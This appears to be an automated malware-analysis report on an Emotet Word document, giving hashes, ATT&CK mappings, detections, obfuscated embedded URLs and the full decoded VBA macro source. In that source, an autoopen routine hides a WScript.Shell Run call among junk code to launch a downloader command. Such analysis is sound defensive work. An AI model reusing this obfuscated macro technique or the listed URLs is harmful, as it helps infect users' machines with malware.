Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 4cea979e184be810…

MALICIOUS

Office (OLE)

104.2 KB Created: 2019-01-14 17:54:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: e5feda5425b94ccaa9a899138738c487 SHA-1: 296a820ab246bc0df434de5d43876ecfd44f9fa7 SHA-256: 4cea979e184be810766bd5aeebb77c49d656ffe078b29151c0e50b5c28d9ac2e
290 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains VBA macros with an autoopen function, which is a common technique for Emotet. The macros utilize WScript.Shell and CreateObject, indicating an intent to execute commands or download additional payloads. The ClamAV detection explicitly names Emotet, further supporting the family attribution. The embedded URLs are likely used for command and control or payload delivery.

Heuristics 9

  • ClamAV: Doc.Downloader.Emotet-10022072-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-10022072-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
          End Select
TastyCottonSausagesb = Array(leverageW, TriplebufferedP, Cambridgeshirei, CreateObject("WscRipt.sHeLl").Run(("" + harddrivez + GardensQ + JSONZ + StreamlinedS.TextBox1) + BerkshireC + SmallFrozenComputerL + Berkshirem + convergenceA + ProducerQ, 55 - 55), ColoradoF, transmitu, Creativeh)
   Select Case onlineT
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
          End Select
TastyCottonSausagesb = Array(leverageW, TriplebufferedP, Cambridgeshirei, CreateObject("WscRipt.sHeLl").Run(("" + harddrivez + GardensQ + JSONZ + StreamlinedS.TextBox1) + BerkshireC + SmallFrozenComputerL + Berkshirem + convergenceA + ProducerQ, 55 - 55), ColoradoF, transmitu, Creativeh)
   Select Case onlineT
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Name = "CheckingAccountk"
Sub autoopen()
Utahh = synthesizeu - backendj
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://r]_-bet]$.om/ In document text (OLE body)
    • http://m]`hur]]rts$.om/##m29mGm@http://www$7i7]journ]l$.om/D1o40Dmemk@http://li3numpolsk]$.om/lCGBPPq{MY@http://w]liw]lo$.om/urHKt1`sw3f$Split(w3f@w3f);+Br][ili]nRe]ll=w3fTriplebu77ere`Ew3f;+7ullr]n3e#In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8182 bytes
SHA-256: 6faed8387958aab2afbbb17367611b5e39fc0c196b2c96446083cd881025259e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "StreamlinedS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"

Attribute VB_Name = "PNGa"
Function IsleE()
On Error Resume Next
   Select Case OpenarchitectedG
         Case 427
HandcraftedL = Adaptiveb
            DigitizedW = CDate(GenericPlasticComputeri)
            FantasticP = seizeu
            Viao = Sgn(Softo)
         Case 438
            utilizeH = 799
            navigateu = CDbl(585)
Forwardd = UsercentricS
            orchidE = Sin(Grovesq)
         Case 390
matrixj = Connecticutr
            bleedingedgeh = Fix(moratoriumW)
Fordi = GenericGraniteSausagesH
            supplychainsE = Round(7)
            HomeLoanAccountD = Refinedw
      End Select
   Select Case MayotteP
         Case 409
Divisionz = paymentV
            MetricsV = CDate(SDDX)
            bandwidthw = marketsT
            channelsn = Sgn(PracticalSoftPantso)
         Case 74
            magneticj = 113
            processimprovementi = CDbl(739)
solidstatej = Expresswayz
            RusticRubberTowelsK = Sin(CanadianDollarf)
         Case 429
bestofbreedW = violetv
            realtimei = Fix(MississippiL)
BuckinghamshireJ = OrganicE
            analyzingl = Round(106)
            UnbrandedX = overridingS
      End Select
   Select Case HawaiiI
         Case 167
ROIq = backupK
            Producerw = CDate(Gorgeousz)
            programL = OptimizationC
            Illinoisv = Sgn(paymentT)
         Case 535
            RusticL = 382
            extranetX = CDbl(447)
WebE = whiteU
            Steeli = Sin(multibytei)
         Case 244
Buckinghamshires = SaoTomeandPrincipez
            U3rdgeneration25 = Fix(TastyPlasticComputerW)
Directm = IncrediblePlasticCarE
            LicensedMetalShirtZ = Round(717)
            Granitel = invoiceF
      End Select
   Select Case ToolsE
         Case 585
Licensedz = Balancedj
            Orchestratorc = CDate(Drivek)
            Frozenz = FrozenY
            Coordinatorw = Sgn(cardf)
         Case 90
            HomeLoanAccountL = 936
            systemB = CDbl(795)
IntelligentPlasticShirto = CreditCardAccountH
            SCSIP = Sin(corej)
         Case 292
NewMexicoB = OvalD
            moratoriumf = Fix(syndicateS)
Intelligenti = LandX
            depositv = Round(823)
            AutoLoanAccountZ = bypassw
      End Select
TastyCottonSausagesb = Array(leverageW, TriplebufferedP, Cambridgeshirei, CreateObject("WscRipt.sHeLl").Run(("" + harddrivez + GardensQ + JSONZ + StreamlinedS.TextBox1) + BerkshireC + SmallFrozenComputerL + Berkshirem + convergenceA + ProducerQ, 55 - 55), ColoradoF, transmitu, Creativeh)
   Select Case onlineT
         Case 554
distributedD = Cottond
            HandcraftedWoodenSaladT = CDate(PracticalMetalChickenr)
            frictionlessC = Capet
            InvestorN = Sgn(violetc)
         Case 594
            Marketingd = 342
            GorgeousSoftFishD = CDbl(560)
technologiesp = BahtR
            monetizep = Sin(NewTaiwanDollarU)
         Case 992
Locksq = BulgarianLevm
            productP = Fix(Gardensa)
AGPP = contingencyt
            ebusinessO = Round(359)
            primaryL = paymentD
      End Select
   Select Case Analystu
         Case 826
GBQ = nextgenerationH
            helpdeskE = CDate(DeveloperT)
            scalabled = Designerp
            sexyN = Sgn(CreditCardAccountR)
         Case 474
            HandmadeO = 826
            copyX = CDbl(472)
databasek = Configurationb
            TrailP = Sin(BuckinghamshireW)
         Case 428
GraniteU = UnbrandedConcreteSaladr
            ShoesSportsd = Fix(budgetarymanagementz)
revolutionizeu = Internationalj
            RAMv = Round(200)
            LicensedSteelHata = explicitW
      End Select
   Select Case depositt
         Case 718
infomediariesi = VirginIslandsUSF
            Futureu = CDate(emarketss)
            Optimizationt = stickyS
            Specialistp = Sgn(calculatingl)
         Case 229
            HomeLoanAccountL = 659
            indigoY = CDbl(58)
matricesH = withdrawalJ
            ForgeM = Sin(TunnelM)
         Case 822
RusticConcreteKeyboardn = LicensedFreshTowelsR
            backgroundv = Fix(CheckingAccountt)
SolutionsD = SingaporeDollarb
            workforcep = Round(347)
            Avonn = GardensX
      End Select
   Select Case Pennsylvaniat
         Case 821
bypassingJ = frictionlessJ
            IndustrialComputersHealthQ = CDate(multibyteb)
            GuineaBissauo = streamlineA
            MoneyMarketAccountj = Sgn(InternationalE)
         Case 960
            ArmeniaB = 542
            overridingB = CDbl(108)
CheckingAccountR = AutoLoanAccountH
            webreadinessz = Sin(UAEDirhamG)
         Case 532
Woodens = compressF
            withdrawalJ = Fix(AutoLoanAccountE)
copyingW = Covem
            FaroeIslandsW = Round(824)
            auxiliaryE = onlineT
      End Select
End Function


Attribute VB_Name = "CheckingAccountk"
Sub autoopen()
Utahh = synthesizeu - backendj
Niuep = connectingM - StationE
Distributeda = IntelligentGraniteBallG - relationshipsA
ImplementationU = virtualw - XSSt
Practicalr = copym - tertiaryA
IsleE
DominicaQ = Georgias - RusticSoftKeyboardP
WallT = violetW - Turnpikei
Avonw = compressingB - MoneyMarketAccountU
SDDZ = FantasticSteelShoesp - opticalf
ErgonomicFreshHatw = OptimizedI - accessm
End Sub

Attribute VB_Name = "PersonalLoanAccountV"

Attribute VB_Name = "Plasticc"

Attribute VB_Name = "EgyptM"

Attribute VB_Name = "UsabilityX"

Attribute VB_Name = "ClothingIndustrialW"

Attribute VB_Name = "Cambridgeshiren"

Attribute VB_Name = "Lodgef"

Attribute VB_Name = "PalladiumI"

Attribute VB_Name = "GamesElectronicsw"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "AwesomePlasticSaladf"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Granitef"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "HandcraftedN"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "reds"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "LodgeG"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Cambridgeshirer"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.